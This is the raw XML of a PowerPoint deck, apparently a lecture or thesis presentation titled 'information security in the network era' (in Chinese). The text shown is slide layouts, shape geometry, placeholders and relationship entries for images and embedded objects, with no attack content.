          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{54B90720-33B4-448E-A3A4-97DF6768709D}"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26979" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126980" name="Rectangle 1027"/>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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5E600D6-85FE-4FBF-B5B2-DD91A0C4365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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5E600D6-85FE-4FBF-B5B2-DD91A0C43656}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="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fld id="{C49AAF3E-6775-4683-8686-33C6AA674794}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" smtClean="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135"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en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2" descr="D:\my thesis\dissertation\final\LOGO.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="57726" y="48500"/>
            <a:ext cx="2786082" cy="788212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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42910" y="142852"/>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4660" y="1543027"/>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37060" y="1543027"/>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1C27503C-9669-4E2B-AC65-B26F3136F412}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}"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reeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="0"/>
            <a:ext cx="54102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1" fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 533400"/>
              <a:gd name="connsiteX1-3" fmla="*/ 6477000 w 6477000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 533400"/>
              <a:gd name="connsiteX2-5" fmla="*/ 6467475 w 6477000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 533400 h 533400"/>
              <a:gd name="connsiteX3-7" fmla="*/ 466725 w 6477000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 523875 h 533400"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 0 h 533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7000" h="533400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6477000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467475" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466725" y="523875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="AD403D"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="219DC9"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="2492990" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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rPr>
              <a:t>网络时代的信息安全</a:t>
            </a:r>
            <a:endParaRPr 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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="0"/>
            <a:ext cx="67056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1" fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 533400"/>
              <a:gd name="connsiteX1-3" fmla="*/ 6477000 w 6477000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 533400"/>
              <a:gd name="connsiteX2-5" fmla="*/ 6467475 w 6477000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 533400 h 533400"/>
              <a:gd name="connsiteX3-7" fmla="*/ 466725 w 6477000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 523875 h 533400"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 0 h 533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7000" h="533400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6477000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467475" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466725" y="523875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1D1C9A">
              <a:alpha val="54000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="42A3DE"/>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13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6740016" y="-14288"/>
            <a:ext cx="2408746" cy="547688"/>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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412776"/>
            <a:ext cx="8229600" cy="471338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 name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774032" y="0"/>
            <a:ext cx="3886200" cy="533400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本占位符 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="692696"/>
            <a:ext cx="8227051" cy="648072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7B42C2F4-0272-43E0-AACD-0D3033685ED9}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BCCA75C2-4895-46C0-B0A2-1B0B612A7675}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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781800" y="6324600"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{817F96ED-DF47-458A-9890-E98408F2CE6E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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727825" y="6407150"/>
            <a:ext cx="1919288" cy="366713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F8B17FE9-14CC-4B0A-9FB0-987AA14B7808}" type="datetime1">
              <a:rPr lang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379913" y="6407150"/>
            <a:ext cx="2351087" cy="365125"/>
          </a:xfrm>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a:xfrm>
            <a:off x="8647113" y="6407150"/>
            <a:ext cx="366712" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{81556F20-9EF8-4651-B294-D3B86E7C8135}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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066800" y="765175"/>
            <a:ext cx="7543800" cy="9715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66800" y="1981200"/>
            <a:ext cx="75438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066800" y="4114800"/>
            <a:ext cx="75438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1066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4290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05600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1DB0EB54-B104-48C8-BE1C-5A5605DF6AF4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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chemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2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
        <p:nvSpPr>
          <p:cNvPr id="8"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lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10"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lstStyle>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC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00174"/>
            <a:ext cx="4040188" cy="762000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>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1500174"/>
            <a:ext cx="4041775" cy="762000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>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2285992"/>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285992"/>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45CA1F53-DDA1-4EF0-A9E1-D01E00B7FF11}"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A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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3C13410D-C0E6-4B31-91FC-0CA71285A5AA}"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9A63598B-C029-4E11-99A6-D686B094EFA2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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A7A34F4A-1983-4C95-8C8A-357F0C0C5D08}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719263"/>
            <a:ext cx="8229600" cy="4411662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="0" smtClean="0"/>
              <a:t>单击图标添加表格</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C5307E4F-B582-4A67-9150-5A7FF4123C2E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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7">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lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22"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lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18"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lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="D:\my thesis\dissertation\final\LOGO.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6322422" y="6069812"/>
            <a:ext cx="2786082" cy="78821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p:pull/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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8.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject35.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject34.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject33.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.wmf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide66.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing10.vml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject32.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49.w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38.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide112.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15.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38.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5.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.w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39.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject38.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject37.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide74.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing11.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68.wmf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject44.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject36.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject43.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject42.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.wmf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject41.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" 